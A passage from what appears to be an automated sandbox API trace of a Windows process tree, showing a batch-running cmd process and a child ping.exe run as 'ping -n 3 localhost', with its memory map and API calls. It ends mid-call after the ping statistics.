_get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.422] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14efac, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x14efac*=0x0, lpOverlapped=0x0) returned 1 [0178.422] GetLastError () returned 0x0 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] GetFileType (hFile=0x54) returned 0x1 [0178.422] _get_osfhandle (_FileHandle=3) returned 0x54 [0178.422] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0178.422] longjmp () [0178.422] _tell (_FileHandle=3) returned 145 [0178.422] _close (_FileHandle=3) returned 0 [0178.422] CmdBatNotification () returned 0x0 [0178.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.423] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.423] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.423] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.423] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.423] SetConsoleInputExeNameW () returned 0x1 [0178.423] GetConsoleOutputCP () returned 0x1b5 [0178.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.423] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.423] exit (_Code=0) Process: id = "314" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16c20" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "313" os_parent_pid = "0xbf8" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24211 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24212 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24213 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24214 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24215 start_va = 0x330000 end_va = 0x337fff entry_point = 0x330000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 24216 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24217 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24218 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24219 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 24220 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24221 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24222 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24223 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24224 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 24225 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24226 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24227 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24228 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24229 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24230 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24231 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24232 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 24233 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 24234 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 24235 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24236 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24237 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24238 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24239 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 24240 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 24241 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24242 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24243 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24244 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 24245 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 24246 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 24247 start_va = 0x210000 end_va = 0x310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 24248 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 24249 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 24250 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 24251 start_va = 0x10e0000 end_va = 0x13aefff entry_point = 0x10e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 24252 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 24253 start_va = 0x13b0000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 24254 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 24255 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 24256 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 24257 start_va = 0x1470000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 24258 start_va = 0x13d0000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 24259 start_va = 0x1430000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 24260 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24261 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 24262 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 24263 start_va = 0x15e0000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 24264 start_va = 0x14f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 24265 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 24266 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 24267 start_va = 0x16d0000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 24268 start_va = 0x1780000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 24269 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 417 os_tid = 0xaac [0175.484] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f7d4 | out: lpSystemTimeAsFileTime=0x20f7d4*(dwLowDateTime=0x9e7eece0, dwHighDateTime=0x1d440a9)) [0175.484] GetCurrentProcessId () returned 0xa70 [0175.484] GetCurrentThreadId () returned 0xaac [0175.484] GetTickCount () returned 0x32ff5 [0175.484] QueryPerformanceCounter (in: lpPerformanceCount=0x20f7cc | out: lpPerformanceCount=0x20f7cc*=23227339198) returned 1 [0175.485] GetModuleHandleA (lpModuleName=0x0) returned 0x330000 [0175.485] __set_app_type (_Type=0x1) [0175.485] __p__fmode () returned 0x76b331f4 [0175.485] __p__commode () returned 0x76b331fc [0175.485] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x332ae1) returned 0x0 [0175.485] __getmainargs (in: _Argc=0x3350d4, _Argv=0x3350dc, _Env=0x3350d8, _DoWildCard=0, _StartInfo=0x3350e8 | out: _Argc=0x3350d4, _Argv=0x3350dc, _Env=0x3350d8) returned 0 [0175.485] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.485] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.485] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x335440 | out: lpWSAData=0x335440) returned 0 [0175.491] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x20f264 | out: phkResult=0x20f264*=0x58) returned 0x0 [0175.491] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x20f258, lpData=0x20f260, lpcbData=0x20f25c*=0x4 | out: lpType=0x20f258*=0x0, lpData=0x20f260*=0x0, lpcbData=0x20f25c*=0x4) returned 0x2 [0175.491] RegCloseKey (hKey=0x58) returned 0x0 [0175.491] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x20f22c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x20f254 | out: ppResult=0x20f254*=0x0) returned 11001 [0175.491] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x20f22c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x20f254 | out: ppResult=0x20f254*=0x4046f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x4047b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4047e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x403a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0175.505] FreeAddrInfoW (pAddrInfo=0x4046f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x4047b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4047e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x403a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0175.505] Icmp6CreateFile () returned 0x408b40 [0175.508] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x404830 [0175.508] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x40ebb0 [0175.508] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f754, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0175.508] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x20f254, nSize=0x0, Arguments=0x20f250 | out: lpBuffer="XH@") returned 0x19 [0175.509] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x404858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0175.509] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.509] _write (in: _FileHandle=1, _Buf=0x404858*, _MaxCharCount=0x19 | out: _Buf=0x404858*) returned 25 [0175.509] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.509] LocalFree (hMem=0x404858) returned 0x0 [0175.509] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x20f258, nSize=0x0, Arguments=0x20f254 | out: lpBuffer="XH@") returned 0x18 [0175.509] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x404858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0175.509] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.509] _write (in: _FileHandle=1, _Buf=0x404858*, _MaxCharCount=0x18 | out: _Buf=0x404858*) returned 24 [0175.509] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.509] LocalFree (hMem=0x404858) returned 0x0 [0175.509] SetConsoleCtrlHandler (HandlerRoutine=0x3317ca, Add=1) returned 1 [0175.509] Icmp6SendEcho2 (in: IcmpHandle=0x408b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x20f2d0, DestinationAddress=0x3355e0, RequestData=0x404830, RequestSize=0x20, RequestOptions=0x20f280, ReplyBuffer=0x40ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x40ebb0) returned 0x1 [0175.510] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f754, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0175.510] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x20f258, nSize=0x0, Arguments=0x20f254 | out: lpBuffer=" Q@") returned 0x10 [0175.510] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x405120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0175.510] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.510] _write (in: _FileHandle=1, _Buf=0x405120*, _MaxCharCount=0x10 | out: _Buf=0x405120*) returned 16 [0175.511] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.511] LocalFree (hMem=0x405120) returned 0x0 [0175.511] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer="\x10<@") returned 0x9 [0175.511] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x403c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0175.511] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.511] _write (in: _FileHandle=1, _Buf=0x403c10*, _MaxCharCount=0x9 | out: _Buf=0x403c10*) returned 9 [0175.511] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.511] LocalFree (hMem=0x403c10) returned 0x0 [0175.511] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer=" \x8f@") returned 0x2 [0175.511] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x408f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0175.511] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0175.511] _write (in: _FileHandle=1, _Buf=0x408f20*, _MaxCharCount=0x2 | out: _Buf=0x408f20*) returned 2 [0175.511] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0175.511] LocalFree (hMem=0x408f20) returned 0x0 [0175.511] Sleep (dwMilliseconds=0x3e8) [0176.718] Icmp6SendEcho2 (in: IcmpHandle=0x408b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x20f2d0, DestinationAddress=0x3355e0, RequestData=0x404830, RequestSize=0x20, RequestOptions=0x20f280, ReplyBuffer=0x40ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x40ebb0) returned 0x1 [0176.790] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f754, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0176.790] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x20f258, nSize=0x0, Arguments=0x20f254 | out: lpBuffer=" Q@") returned 0x10 [0176.790] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x405120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0176.790] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0176.790] _write (in: _FileHandle=1, _Buf=0x405120*, _MaxCharCount=0x10 | out: _Buf=0x405120*) returned 16 [0176.790] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0176.790] LocalFree (hMem=0x405120) returned 0x0 [0176.790] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer="\x10<@") returned 0x9 [0176.790] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x403c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0176.791] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0176.791] _write (in: _FileHandle=1, _Buf=0x403c10*, _MaxCharCount=0x9 | out: _Buf=0x403c10*) returned 9 [0176.791] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0176.791] LocalFree (hMem=0x403c10) returned 0x0 [0176.791] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer=" \x8f@") returned 0x2 [0176.791] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x408f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0176.791] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0176.791] _write (in: _FileHandle=1, _Buf=0x408f20*, _MaxCharCount=0x2 | out: _Buf=0x408f20*) returned 2 [0176.791] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0176.791] LocalFree (hMem=0x408f20) returned 0x0 [0176.791] Sleep (dwMilliseconds=0x3e8) [0177.933] Icmp6SendEcho2 (in: IcmpHandle=0x408b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x20f2d0, DestinationAddress=0x3355e0, RequestData=0x404830, RequestSize=0x20, RequestOptions=0x20f280, ReplyBuffer=0x40ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x40ebb0) returned 0x1 [0178.043] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f754, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0178.043] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x20f258, nSize=0x0, Arguments=0x20f254 | out: lpBuffer=" Q@") returned 0x10 [0178.043] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x405120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0178.043] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.044] _write (in: _FileHandle=1, _Buf=0x405120*, _MaxCharCount=0x10 | out: _Buf=0x405120*) returned 16 [0178.044] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.044] LocalFree (hMem=0x405120) returned 0x0 [0178.044] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer="\x10<@") returned 0x9 [0178.044] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x403c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0178.044] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.044] _write (in: _FileHandle=1, _Buf=0x403c10*, _MaxCharCount=0x9 | out: _Buf=0x403c10*) returned 9 [0178.044] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.044] LocalFree (hMem=0x403c10) returned 0x0 [0178.044] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x20f25c, nSize=0x0, Arguments=0x20f258 | out: lpBuffer=" \x8f@") returned 0x2 [0178.044] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x408f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0178.044] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.044] _write (in: _FileHandle=1, _Buf=0x408f20*, _MaxCharCount=0x2 | out: _Buf=0x408f20*) returned 2 [0178.044] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.044] LocalFree (hMem=0x408f20) returned 0x0 [0178.044] getnameinfo (in: pSockaddr=0x3355e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x20f220, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0178.044] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x20f1f0, nSize=0x0, Arguments=0x20f1ec | out: lpBuffer="\xd0\x0c\x41") returned 0x56 [0178.045] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x410cd0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0178.045] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.045] _write (in: _FileHandle=1, _Buf=0x410cd0*, _MaxCharCount=0x56 | out: _Buf=0x410cd0*) returned 86 [0178.045] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.045] LocalFree (hMem=0x410cd0) returned 0x0 [0178.045] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, 